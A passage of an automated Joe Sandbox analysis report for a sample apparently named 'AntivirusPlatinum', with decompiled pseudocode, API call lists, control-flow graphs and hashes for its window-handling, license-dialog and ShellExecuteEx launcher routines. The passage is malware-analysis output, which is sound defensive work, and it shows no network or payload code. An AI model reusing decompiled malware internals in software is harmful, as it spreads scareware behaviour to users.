                                                                                                                                                      							__eflags =  *((char*)(_t59 + _t99)) - 0x22;
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								 *((char*)(_t59 + _t99)) = 0x20;
                                                                                                                                                      								goto L12;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						goto L12;
                                                                                                                                                      						L14:
                                                                                                                                                      						_t59 = _t59 + 1;
                                                                                                                                                      						_t94 = _t59 + _t99;
                                                                                                                                                      					} while ( *_t94 != 0);
                                                                                                                                                      					goto L19;
                                                                                                                                                      				}
                                                                                                                                                      			}
























                                                                                                                                                      0x0040bd8a
                                                                                                                                                      0x0040bd8d
                                                                                                                                                      0x0040bd97
                                                                                                                                                      0x0040bf96
                                                                                                                                                      0x0040bf96
                                                                                                                                                      0x0040bda1
                                                                                                                                                      0x0040bdaa
                                                                                                                                                      0x0040bdaf
                                                                                                                                                      0x0040bdb1
                                                                                                                                                      0x0040bdb4
                                                                                                                                                      0x0040bdbe
                                                                                                                                                      0x0040bdc8
                                                                                                                                                      0x0040bdc0
                                                                                                                                                      0x0040bdc3
                                                                                                                                                      0x0040bdc3
                                                                                                                                                      0x0040bdcb
                                                                                                                                                      0x0040bdcf
                                                                                                                                                      0x0040be10
                                                                                                                                                      0x0040be13
                                                                                                                                                      0x0040be1d
                                                                                                                                                      0x0040be1d
                                                                                                                                                      0x0040be27
                                                                                                                                                      0x0040be2e
                                                                                                                                                      0x0040be33
                                                                                                                                                      0x0040be38
                                                                                                                                                      0x0040be40
                                                                                                                                                      0x0040be45
                                                                                                                                                      0x0040be47
                                                                                                                                                      0x0040be49
                                                                                                                                                      0x0040be49
                                                                                                                                                      0x0040be47
                                                                                                                                                      0x0040be54
                                                                                                                                                      0x0040be59
                                                                                                                                                      0x0040be5e
                                                                                                                                                      0x0040be6a
                                                                                                                                                      0x0040be75
                                                                                                                                                      0x0040be75
                                                                                                                                                      0x0040be7b
                                                                                                                                                      0x0040beb7
                                                                                                                                                      0x0040bec1
                                                                                                                                                      0x0040beca
                                                                                                                                                      0x0040bee9
                                                                                                                                                      0x0040beef
                                                                                                                                                      0x0040bef2
                                                                                                                                                      0x0040bef8
                                                                                                                                                      0x0040beff
                                                                                                                                                      0x0040bf06
                                                                                                                                                      0x0040bf1a
                                                                                                                                                      0x0040bf1c
                                                                                                                                                      0x0040bf1c
                                                                                                                                                      0x0040bf28
                                                                                                                                                      0x0040bf31
                                                                                                                                                      0x0040bf31
                                                                                                                                                      0x0040bf39
                                                                                                                                                      0x0040bf42
                                                                                                                                                      0x0040bf55
                                                                                                                                                      0x0040bf55
                                                                                                                                                      0x0040bf5b
                                                                                                                                                      0x0040bf6b
                                                                                                                                                      0x0040bf77
                                                                                                                                                      0x0040bf77
                                                                                                                                                      0x0040bf7d
                                                                                                                                                      0x0040bf62
                                                                                                                                                      0x0040bf7d
                                                                                                                                                      0x0040bf7d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bf44
                                                                                                                                                      0x0040bf4c
                                                                                                                                                      0x0040bf53
                                                                                                                                                      0x0040bf83
                                                                                                                                                      0x0040bf86
                                                                                                                                                      0x0040bf90
                                                                                                                                                      0x0040bf90
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bf86
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bf53
                                                                                                                                                      0x0040bf42
                                                                                                                                                      0x0040becc
                                                                                                                                                      0x0040bed7
                                                                                                                                                      0x0040bede
                                                                                                                                                      0x0040bee3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040be7d
                                                                                                                                                      0x0040be7d
                                                                                                                                                      0x0040be80
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040be8c
                                                                                                                                                      0x0040be9d
                                                                                                                                                      0x0040beaa
                                                                                                                                                      0x0040beb1
                                                                                                                                                      0x0040bf92
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bf93
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040beb1
                                                                                                                                                      0x0040bdd1
                                                                                                                                                      0x0040bdd1
                                                                                                                                                      0x0040bdd3
                                                                                                                                                      0x0040bdd6
                                                                                                                                                      0x0040bdec
                                                                                                                                                      0x0040bdf0
                                                                                                                                                      0x0040be03
                                                                                                                                                      0x0040be05
                                                                                                                                                      0x0040be08
                                                                                                                                                      0x0040be0a
                                                                                                                                                      0x0040be0a
                                                                                                                                                      0x0040be0c
                                                                                                                                                      0x0040be0c
                                                                                                                                                      0x0040be0d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bdf0
                                                                                                                                                      0x0040bde0
                                                                                                                                                      0x0040bde0
                                                                                                                                                      0x0040bde4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bdda
                                                                                                                                                      0x0040bdde
                                                                                                                                                      0x0040bde8
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bde8
                                                                                                                                                      0x0040bdde
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040bdf9
                                                                                                                                                      0x0040bdf9
                                                                                                                                                      0x0040bdfa
                                                                                                                                                      0x0040bdfd
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040be01

                                                                                                                                                      APIs
                                                                                                                                                      • ShellExecuteExA.SHELL32(?,?,00000000,?,?,00000000,0000003C), ref: 0040BEC1
                                                                                                                                                      • ShellExecuteExA.SHELL32(?), ref: 0040BEDA
                                                                                                                                                      • IsWindowVisible.USER32(00000000), ref: 0040BF09
                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 0040BF1A
                                                                                                                                                      • WaitForInputIdle.USER32 ref: 0040BF28
                                                                                                                                                      • CloseHandle.KERNEL32(?,?), ref: 0040BF39
                                                                                                                                                      • Sleep.KERNEL32(-000003E9), ref: 0040BF7D
                                                                                                                                                      • ShowWindow.USER32(00000001), ref: 0040BF90
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$ExecuteShellShow$CloseHandleIdleInputSleepVisibleWait
                                                                                                                                                      • String ID: .exe$.inf$H&A
                                                                                                                                                      • API String ID: 1160896117-531445332
                                                                                                                                                      • Opcode ID: b7dee75aeb9799dd9861f79fa20cac1b541133cd67bd5b6c605619c8926ae4b1
                                                                                                                                                      • Instruction ID: a16589b2b5277c8e661bbc98e08cb4bbb4dd1f4ec6966d8106822106ff6d3530
                                                                                                                                                      • Opcode Fuzzy Hash: b7dee75aeb9799dd9861f79fa20cac1b541133cd67bd5b6c605619c8926ae4b1
                                                                                                                                                      • Instruction Fuzzy Hash: 5351B171845289BEDB21EBA0DC44ADE7BA9EF04304F1484BBE540F72D2D3798D858B9D
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 837 40970e-409766 call 409637 GetWindowRect GetClientRect 840 409768-40976c 837->840 841 40979b-40979f 837->841 842 4097db-4097fa GetSystemMetrics GetWindow 840->842 843 40976e-409795 SetWindowPos 840->843 841->842 844 4097a1-4097d5 GetWindowTextA call 409553 SetWindowTextA 841->844 846 4098d1-4098d3 842->846 843->841 844->842 847 4098d9-4098dd 846->847 848 4097ff-409806 846->848 848->847 850 40980c-409828 GetWindowTextA 848->850 851 40982a-409849 call 409553 SetWindowTextA 850->851 852 40984f-409853 850->852 851->852 854 409855-4098b5 GetWindowRect SetWindowPos 852->854 855 4098bb-4098cc GetWindow 852->855 854->855 855->847 856 4098ce 855->856 856->846
                                                                                                                                                      C-Code - Quality: 64%
                                                                                                                                                      			E0040970E(intOrPtr __ecx, void* __eflags, signed int _a4, intOrPtr _a8, struct HWND__* _a12) {
                                                                                                                                                      				char _v5;
                                                                                                                                                      				signed int _v12;
                                                                                                                                                      				signed int _v16;
                                                                                                                                                      				intOrPtr _v20;
                                                                                                                                                      				struct HWND__* _v24;
                                                                                                                                                      				struct tagRECT _v40;
                                                                                                                                                      				struct tagRECT _v56;
                                                                                                                                                      				struct tagRECT _v72;
                                                                                                                                                      				char _v1096;
                                                                                                                                                      				signed int _t96;
                                                                                                                                                      				struct HWND__* _t98;
                                                                                                                                                      				signed int _t116;
                                                                                                                                                      				signed int _t123;
                                                                                                                                                      				signed int _t147;
                                                                                                                                                      				signed int _t150;
                                                                                                                                                      				signed int _t153;
                                                                                                                                                      				void* _t163;
                                                                                                                                                      				void* _t167;
                                                                                                                                                      				void* _t168;
                                                                                                                                                      
                                                                                                                                                      				_v20 = __ecx;
                                                                                                                                                      				_v5 = E00409637(__ecx, __eflags, _a8,  &_v16,  &_v12);
                                                                                                                                                      				GetWindowRect(_a4,  &_v40);
                                                                                                                                                      				GetClientRect(_a4,  &_v72);
                                                                                                                                                      				_t96 = _v72.bottom;
                                                                                                                                                      				_t163 = _v40.right - _v72.right - _v40.left + 1;
                                                                                                                                                      				_t167 = _v40.bottom - _t96 - _v40.top + 1;
                                                                                                                                                      				if(_v5 == 0) {
                                                                                                                                                      					L3:
                                                                                                                                                      					if(_a12 == 0) {
                                                                                                                                                      						GetWindowTextA(_a4,  &_v1096, 0x400);
                                                                                                                                                      						E00409553(_v20,  &_v1096,  &_v1096, 1, _a8);
                                                                                                                                                      						SetWindowTextA(_a4,  &_v1096); // executed
                                                                                                                                                      					}
                                                                                                                                                      					L5:
                                                                                                                                                      					_t168 = _t167 - GetSystemMetrics(8);
                                                                                                                                                      					_t98 = GetWindow(_a4, 5);
                                                                                                                                                      					_a4 = _a4 & 0x00000000;
                                                                                                                                                      					_a12 = _t98;
                                                                                                                                                      					_v24 = _t98;
                                                                                                                                                      					while(_t98 != 0) {
                                                                                                                                                      						__eflags = _a4 - 0x200;
                                                                                                                                                      						if(_a4 >= 0x200) {
                                                                                                                                                      							break;
                                                                                                                                                      						}
                                                                                                                                                      						GetWindowTextA(_a12,  &_v1096, 0x400); // executed
                                                                                                                                                      						__eflags = _v1096;
                                                                                                                                                      						if(_v1096 != 0) {
                                                                                                                                                      							E00409553(_v20,  &_v1096,  &_v1096, 1, _a8);
                                                                                                                                                      							SetWindowTextA(_a12,  &_v1096); // executed
                                                                                                                                                      						}
                                                                                                                                                      						__eflags = _v5;
                                                                                                                                                      						if(_v5 != 0) {
                                                                                                                                                      							GetWindowRect(_a12,  &_v56);
                                                                                                                                                      							_push(0x204);
                                                                                                                                                      							asm("cdq");
                                                                                                                                                      							_t147 = 0x64;
                                                                                                                                                      							_push((_v56.bottom - _v56.top + 1) * _v12 / _t147);
                                                                                                                                                      							asm("cdq");
                                                                                                                                                      							_push((_v56.right - _v56.left + 1) * _v16 / _t147);
                                                                                                                                                      							_t116 = (_v56.top - _v40.top - _t168) * _v12;
                                                                                                                                                      							asm("cdq");
                                                                                                                                                      							_push(_t116 / _t147);
                                                                                                                                                      							asm("cdq");
                                                                                                                                                      							_t123 = (_v56.left - (_t163 - _t116 % _t147 >> 1) - _v40.left) * _v16;
                                                                                                                                                      							_t150 = 0x64;
                                                                                                                                                      							asm("cdq");
                                                                                                                                                      							__eflags = _t123 % _t150;
                                                                                                                                                      							SetWindowPos(_a12, 0, _t123 / _t150, ??, ??, ??, ??);
                                                                                                                                                      						}
                                                                                                                                                      						_t98 = GetWindow(_a12, 2);
                                                                                                                                                      						_a12 = _t98;
                                                                                                                                                      						__eflags = _t98 - _v24;
                                                                                                                                                      						if(_t98 == _v24) {
                                                                                                                                                      							break;
                                                                                                                                                      						} else {
                                                                                                                                                      							_t87 =  &_a4;
                                                                                                                                                      							 *_t87 = _a4 + 1;
                                                                                                                                                      							__eflags =  *_t87;
                                                                                                                                                      							continue;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					return _t98;
                                                                                                                                                      				}
                                                                                                                                                      				if(_a12 != 0) {
                                                                                                                                                      					goto L5;
                                                                                                                                                      				}
                                                                                                                                                      				_push(0x206);
                                                                                                                                                      				asm("cdq");
                                                                                                                                                      				_t153 = 0x64;
                                                                                                                                                      				asm("cdq");
                                                                                                                                                      				SetWindowPos(_a4, 0, 0, 0, _v72.right * _v16 / _t153 + _t163, _t96 * _v12 / _t153 + _t167, ??);
                                                                                                                                                      				goto L3;
                                                                                                                                                      			}






















                                                                                                                                                      0x00409725
                                                                                                                                                      0x00409733
                                                                                                                                                      0x0040973d
                                                                                                                                                      0x00409746
                                                                                                                                                      0x00409755
                                                                                                                                                      0x00409760
                                                                                                                                                      0x00409761
                                                                                                                                                      0x00409766
                                                                                                                                                      0x0040979b
                                                                                                                                                      0x0040979f
                                                                                                                                                      0x004097b0
                                                                                                                                                      0x004097c6
                                                                                                                                                      0x004097d5
                                                                                                                                                      0x004097d5
                                                                                                                                                      0x004097db
                                                                                                                                                      0x004097e8
                                                                                                                                                      0x004097ea
                                                                                                                                                      0x004097f0
                                                                                                                                                      0x004097f4
                                                                                                                                                      0x004097f7
                                                                                                                                                      0x004098d1
                                                                                                                                                      0x004097ff
                                                                                                                                                      0x00409806
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040981b
                                                                                                                                                      0x00409821
                                                                                                                                                      0x00409828
                                                                                                                                                      0x0040983a
                                                                                                                                                      0x00409849
                                                                                                                                                      0x00409849
                                                                                                                                                      0x0040984f
                                                                                                                                                      0x00409853
                                                                                                                                                      0x0040985c
                                                                                                                                                      0x00409864
                                                                                                                                                      0x0040986e
                                                                                                                                                      0x00409871
                                                                                                                                                      0x00409874
                                                                                                                                                      0x00409880
                                                                                                                                                      0x00409883
                                                                                                                                                      0x0040988c
                                                                                                                                                      0x00409890
                                                                                                                                                      0x00409893
                                                                                                                                                      0x00409896
                                                                                                                                                      0x004098a7
                                                                                                                                                      0x004098ab
                                                                                                                                                      0x004098ac
                                                                                                                                                      0x004098ad
                                                                                                                                                      0x004098b5
                                                                                                                                                      0x004098b5
                                                                                                                                                      0x004098c0
                                                                                                                                                      0x004098c6
                                                                                                                                                      0x004098c9
                                                                                                                                                      0x004098cc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004098ce
                                                                                                                                                      0x004098ce
                                                                                                                                                      0x004098ce
                                                                                                                                                      0x004098ce
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004098ce
                                                                                                                                                      0x004098cc
                                                                                                                                                      0x004098dd
                                                                                                                                                      0x004098dd
                                                                                                                                                      0x0040976c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409772
                                                                                                                                                      0x00409777
                                                                                                                                                      0x0040977a
                                                                                                                                                      0x00409787
                                                                                                                                                      0x00409795
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • GetWindowRect.USER32 ref: 0040973D
                                                                                                                                                      • GetClientRect.USER32 ref: 00409746
                                                                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000110,?,00000206,?,?,00000000), ref: 00409795
                                                                                                                                                      • GetWindowTextA.USER32 ref: 004097B0
                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 004097D5
                                                                                                                                                      • GetSystemMetrics.USER32 ref: 004097DD
                                                                                                                                                      • GetWindow.USER32(?,00000005), ref: 004097EA
                                                                                                                                                      • GetWindowTextA.USER32 ref: 0040981B
                                                                                                                                                      • SetWindowTextA.USER32(00000000,00000000), ref: 00409849
                                                                                                                                                      • GetWindowRect.USER32 ref: 0040985C
                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000110,00000200,00000110,00000200,00000204,?,?,00000000), ref: 004098B5
                                                                                                                                                      • GetWindow.USER32(00000000,00000002), ref: 004098C0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Window$Text$Rect$ClientMetricsSystem
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3650388129-0
                                                                                                                                                      • Opcode ID: 086d87c6db1583cae1e0a1359c2cdab8b27d579fa2fa3cb7dbb4704c7b05527b
                                                                                                                                                      • Instruction ID: 4bbafb19eaccdd502d9e93db46d4c5b42238c20fbbadc0178a3eb5a30deeaea3
                                                                                                                                                      • Opcode Fuzzy Hash: 086d87c6db1583cae1e0a1359c2cdab8b27d579fa2fa3cb7dbb4704c7b05527b
                                                                                                                                                      • Instruction Fuzzy Hash: 76512B72900209AFEF05DFA8CD49FEEBBB9EB48300F048066FA05E61A1D7759E55CB54
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 858 40aafc-40ab0a call 406ea5 861 40ab10-40ab17 858->861 862 40ab9d-40ab9e 858->862 863 40ab56-40ab69 GetClassNameA 861->863 864 40ab19-40ab20 861->864 866 40ab6b-40ab7e lstrcmpiA 863->866 867 40ab8f-40ab91 863->867 864->862 865 40ab22-40ab2f GetModuleHandleA 864->865 868 40ab31-40ab3d GetProcAddress 865->868 869 40ab42-40ab54 865->869 870 40ab80-40ab8c FindWindowExA 866->870 871 40ab8e 866->871 872 40ab93-40ab96 SHAutoComplete 867->872 873 40ab9c 867->873 868->869 869->862 869->863 870->871 871->867 872->873 873->862
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E0040AAFC(signed int __ecx, void* __eflags, long _a4) {
                                                                                                                                                      				char _v84;
                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                      				long _t8;
                                                                                                                                                      				struct HINSTANCE__* _t10;
                                                                                                                                                      				signed int _t12;
                                                                                                                                                      				long _t15;
                                                                                                                                                      				CHAR* _t18;
                                                                                                                                                      
                                                                                                                                                      				_t12 = __ecx;
                                                                                                                                                      				_t6 = E00406EA5();
                                                                                                                                                      				if(_t6 >= 5) {
                                                                                                                                                      					if( *0x41f314 != 0) {
                                                                                                                                                      						L6:
                                                                                                                                                      						_t15 = _a4;
                                                                                                                                                      						_t8 = GetClassNameA(_t15,  &_v84, 0x50);
                                                                                                                                                      						if(_t8 != 0) {
                                                                                                                                                      							_t18 = "EDIT";
                                                                                                                                                      							_t8 = lstrcmpiA( &_v84, _t18);
                                                                                                                                                      							if(_t8 != 0) {
                                                                                                                                                      								_t8 = FindWindowExA(_t15, 0, _t18, 0); // executed
                                                                                                                                                      								_t15 = _t8;
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      						if(_t15 != 0) {
                                                                                                                                                      							_t8 = SHAutoComplete(_t15, 0x10); // executed
                                                                                                                                                      						}
                                                                                                                                                      						return _t8;
                                                                                                                                                      					}
                                                                                                                                                      					if( *0x41f312 == 0) {
                                                                                                                                                      						_t10 = GetModuleHandleA("shlwapi.dll");
                                                                                                                                                      						if(_t10 != 0) {
                                                                                                                                                      							 *0x41f314 = GetProcAddress(_t10, "SHAutoComplete");
                                                                                                                                                      						}
                                                                                                                                                      						_t6 =  *0x41f314;
                                                                                                                                                      						 *0x41f312 = _t12 & 0xffffff00 | _t6 != 0x00000000;
                                                                                                                                                      						if(_t6 != 0) {
                                                                                                                                                      							goto L6;
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				return _t6;
                                                                                                                                                      			}










                                                                                                                                                      0x0040aafc
                                                                                                                                                      0x0040ab02
                                                                                                                                                      0x0040ab0a
                                                                                                                                                      0x0040ab17
                                                                                                                                                      0x0040ab56
                                                                                                                                                      0x0040ab57
                                                                                                                                                      0x0040ab61
                                                                                                                                                      0x0040ab69
                                                                                                                                                      0x0040ab6c
                                                                                                                                                      0x0040ab76
                                                                                                                                                      0x0040ab7e
                                                                                                                                                      0x0040ab86
                                                                                                                                                      0x0040ab8c
                                                                                                                                                      0x0040ab8c
                                                                                                                                                      0x0040ab8e
                                                                                                                                                      0x0040ab91
                                                                                                                                                      0x0040ab96
                                                                                                                                                      0x0040ab96
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ab9c
                                                                                                                                                      0x0040ab20
                                                                                                                                                      0x0040ab27
                                                                                                                                                      0x0040ab2f
                                                                                                                                                      0x0040ab3d
                                                                                                                                                      0x0040ab3d
                                                                                                                                                      0x0040ab42
                                                                                                                                                      0x0040ab4c
                                                                                                                                                      0x0040ab54
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040ab54
                                                                                                                                                      0x0040ab20
                                                                                                                                                      0x0040ab9e

                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00406EA5: GetVersionExA.KERNEL32(?), ref: 00406EC9
                                                                                                                                                      • GetModuleHandleA.KERNEL32(shlwapi.dll), ref: 0040AB27
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0040AB37
                                                                                                                                                      • GetClassNameA.USER32(?,?,00000050), ref: 0040AB61
                                                                                                                                                      • lstrcmpiA.KERNEL32(?,EDIT,?), ref: 0040AB76
                                                                                                                                                      • FindWindowExA.USER32(?,00000000,EDIT,00000000), ref: 0040AB86
                                                                                                                                                      • SHAutoComplete.SHLWAPI(?,00000010), ref: 0040AB96
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000F.00000002.377857589.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 0000000F.00000002.377756650.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378031022.0000000000412000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378079732.0000000000414000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378294705.000000000041E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      • Associated: 0000000F.00000002.378788980.0000000000421000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_15_2_400000_Endermanch@AntivirusPlatinum.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressAutoClassCompleteFindHandleModuleNameProcVersionWindowlstrcmpi
                                                                                                                                                      • String ID: EDIT$SHAutoComplete$shlwapi.dll
                                                                                                                                                      • API String ID: 1963989359-1514112725
                                                                                                                                                      • Opcode ID: 061a7f006815cb5225704708e58f3b1d48e22e535db15eec59ec71c478efb3d3
                                                                                                                                                      • Instruction ID: cf58bb30e006859db208b778a9a0797c0316ea9abfae2e107aa60b4248c819fa
                                                                                                                                                      • Opcode Fuzzy Hash: 061a7f006815cb5225704708e58f3b1d48e22e535db15eec59ec71c478efb3d3
                                                                                                                                                      • Instruction Fuzzy Hash: 021186715003096BE7109B65AD45FEB3BBDAB45700F04803ABA05E21D0D7B8E565D66E
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Control-flow Graph

                                                                                                                                                      • Executed
                                                                                                                                                      • Not Executed
                                                                                                                                                      control_flow_graph 874 40cb2b-40cb53 call 40309d 877 40cb73-40cb81 874->877 878 40cb55-40cb56 874->878 881 40cb83-40cb8c SendMessageA 877->881 882 40cb8e-40cb95 877->882 879 40cb66-40cb68 878->879 880 40cb58-40cb5d 878->880 885 40cc1e-40cc21 879->885 883 40cc12 880->883 884 40cb63-40cb64 880->884 881->882 886 40cba7-40cbf0 call 40ba36 GetDlgItem SendMessageA GetSysColor SendMessageA call 40bf99 882->886 887 40cb97-40cba1 SendDlgItemMessageA 882->887 890 40cc14-40cc15 EndDialog 883->890 884->879 889 40cb6d-40cb6e 884->889 886->883 895 40cbf2-40cc10 call 406d54 call 40a205 886->895 887->886 889->890 892 40cc1b-40cc1d 890->892 892->885 895->892
                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                      			E0040CB2B(void* __ecx, void* __edx, void* __esi, struct HWND__* _a4, intOrPtr _a8, signed short _a12, intOrPtr _a16) {
                                                                                                                                                      				void* _t9;
                                                                                                                                                      				long _t10;
                                                                                                                                                      				long _t11;
                                                                                                                                                      				long _t18;
                                                                                                                                                      				void* _t29;
                                                                                                                                                      				struct HWND__* _t32;
                                                                                                                                                      				void* _t34;
                                                                                                                                                      				struct HWND__* _t36;
                                                                                                                                                      				void* _t38;
                                                                                                                                                      
                                                                                                                                                      				_t35 = __edx;
                                                                                                                                                      				_t36 = _a4;
                                                                                                                                                      				E0040309D(__edx, _t36, _a8, _a12, _a16, "LICENSEDLG", 0, 0); // executed
                                                                                                                                                      				_t9 = _a8 - 0x110;
                                                                                                                                                      				if(_t9 == 0) {
                                                                                                                                                      					_t10 =  *0x4192d4; // 0x24025d
                                                                                                                                                      					_t38 = SendMessageA;
                                                                                                                                                      					__eflags = _t10;
                                                                                                                                                      					if(_t10 != 0) {
                                                                                                                                                      						SendMessageA(_t36, 0x80, 1, _t10);
                                                                                                                                                      					}
                                                                                                                                                      					_t11 =  *0x4192d0; // 0xec050b71
                                                                                                                                                      					__eflags = _t11;
                                                                                                                                                      					if(__eflags != 0) {
                                                                                                                                                      						SendDlgItemMessageA(_t36, 0x66, 0x172, 0, _t11); // executed
                                                                                                                                                      					}
                                                                                                                                                      					E0040BA36(_t35, __eflags, _t36);
                                                                                                                                                      					_t32 = GetDlgItem(_t36, 0x65);
                                                                                                                                                      					SendMessageA(_t32, 0x435, 0, 0x10000);
                                                                                                                                                      					SendMessageA(_t32, 0x443, 0, GetSysColor(0xf));
                                                                                                                                                      					E0040BF99(_t35, _t38, _t36,  *0x41a818, 3);
                                                                                                                                                      					_t18 =  *0x41a820;
                                                                                                                                                      					__eflags = _t18;
                                                                                                                                                      					if(_t18 == 0) {
                                                                                                                                                      						L12:
                                                                                                                                                      						_push(1);
                                                                                                                                                      						L13:
                                                                                                                                                      						EndDialog(_t36, ??); // executed
                                                                                                                                                      						goto L14;
                                                                                                                                                      					} else {
                                                                                                                                                      						_t34 =  *0x418ec8; // 0x0
                                                                                                                                                      						E00406D54(_t34,  *0x414c74, _t32, _t18);
                                                                                                                                                      						E0040A205( *0x41a820);
                                                                                                                                                      						L14:
                                                                                                                                                      						__eflags = 1;
                                                                                                                                                      						return 1;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				if(_t9 != 1) {
                                                                                                                                                      					L4:
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t29 = (_a12 & 0x0000ffff) - 1;
                                                                                                                                                      				if(_t29 == 0) {
                                                                                                                                                      					goto L12;
                                                                                                                                                      				}
                                                                                                                                                      				if(_t29 == 1) {
                                                                                                                                                      					_push(0);
                                                                                                                                                      					goto L13;
                                                                                                                                                      				}
                                                                                                                                                      				goto L4;
                                                                                                                                                      			}












                                                                                                                                                      0x0040cb2b
                                                                                                                                                      0x0040cb30
                                                                                                                                                      0x0040cb46
                                                                                                                                                      0x0040cb4e
                                                                                                                                                      0x0040cb53
                                                                                                                                                      0x0040cb73
                                                                                                                                                      0x0040cb79
                                                                                                                                                      0x0040cb7f
                                                                                                                                                      0x0040cb81
                                                                                                                                                      0x0040cb8c
                                                                                                                                                      0x0040cb8c
                                                                                                                                                      0x0040cb8e
                                                                                                                                                      0x0040cb93
                                                                                                                                                      0x0040cb95
                                                                                                                                                      0x0040cba1
                                                                                                                                                      0x0040cba1
                                                                                                                                                      0x0040cba8
                                                                                                                                                      0x0040cbbd
                                                                                                                                                      0x0040cbc5
                                                                                                                                                      0x0040cbd8
                                                                                                                                                      0x0040cbe3
                                                                                                                                                      0x0040cbe8
                                                                                                                                                      0x0040cbee
                                                                                                                                                      0x0040cbf0
                                                                                                                                                      0x0040cc12
                                                                                                                                                      0x0040cc12
